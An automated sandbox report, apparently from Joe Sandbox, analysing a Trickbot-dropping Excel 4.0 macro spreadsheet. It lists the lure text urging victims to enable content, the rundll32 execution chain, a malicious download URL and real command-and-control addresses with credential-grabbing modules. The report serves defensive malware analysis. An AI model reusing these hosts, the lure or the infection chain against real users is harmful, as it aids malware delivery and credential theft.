Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls)
Analysis ID:355606
MD5:31964397103260697c37ee4237194da9
SHA1:7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94
SHA256:12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1916 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2828 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1980 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2884 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2892 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2081720951.00000000005D8000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000003.2077502883.0000000000764000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2081503635.0000000000130000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000003.2077497175.0000000000764000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000002.2081774299.0000000000730000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.130000.0.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.130000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1916, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2828

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: wermgr.exe.2892.6.memstrMalware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsVirustotal: Detection: 11%Perma Link
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0 CryptAcquireContextW,

                Compliance:

                barindex
                Uses insecure TLS / SSL version for HTTPS connectionShow sources
                Source: unknownHTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49166 version: TLS 1.0
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2082692361.000000006E869000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 10[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.202.191.164:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49166 -> 142.202.191.164:443
                Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49168 -> 108.170.20.75:443
                Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49170 -> 200.52.147.93:443
                Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49171 -> 186.137.85.76:443
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorIPs: 200.52.147.93:443
                Source: Joe Sandbox ViewIP Address: 142.202.191.164 142.202.191.164
                Source: Joe Sandbox ViewIP Address: 108.170.20.75 108.170.20.75
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewASN Name: DYNUUS DYNUUS
                Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
                Source: Joe Sandbox ViewASN Name: RedesyTelecomunicacionesHN RedesyTelecomunicacionesHN
                Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 142.202.191.164:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 142.202.191.164
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: wermgr.exe, 00000006.00000002.2349584225.0000000034050000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000006.00000002.2348794656.00000000334F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2083207432.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2082015096.0000000002317000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349365108.0000000033AC7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2343779349.000000000024A000.00000004.00000020.sdmpString found in binary or memory: https://142.202.191.164/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2343826790.00000000002C1000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file/
                Source: wermgr.exe, 00000006.00000002.2343761722.000000000021E000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/320946_W617601.F9BBFBBC7DBF7A22FB7533B3DADD73B3/5/file//
                Source: wermgr.exe, 00000006.00000002.2343795970.000000000026F000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                E-Banking Fraud:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2892, type: MEMORY

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 15 16 Once you have enabled editing, please click
                Source: Screenshot number: 4Screenshot OCR: Enable content button ,1 " from the yellow bar above )1 23 24 25 26 27 28 29 30 31 32 3
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000A0040
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2082979056.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2081858418.0000000002130000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2349178856.00000000338E0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/11@1/4
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\AEBE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{0F3EC383-8D4F-8C99-8BC8-F01525837B0B}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB309.tmpJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsVirustotal: Detection: 11%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
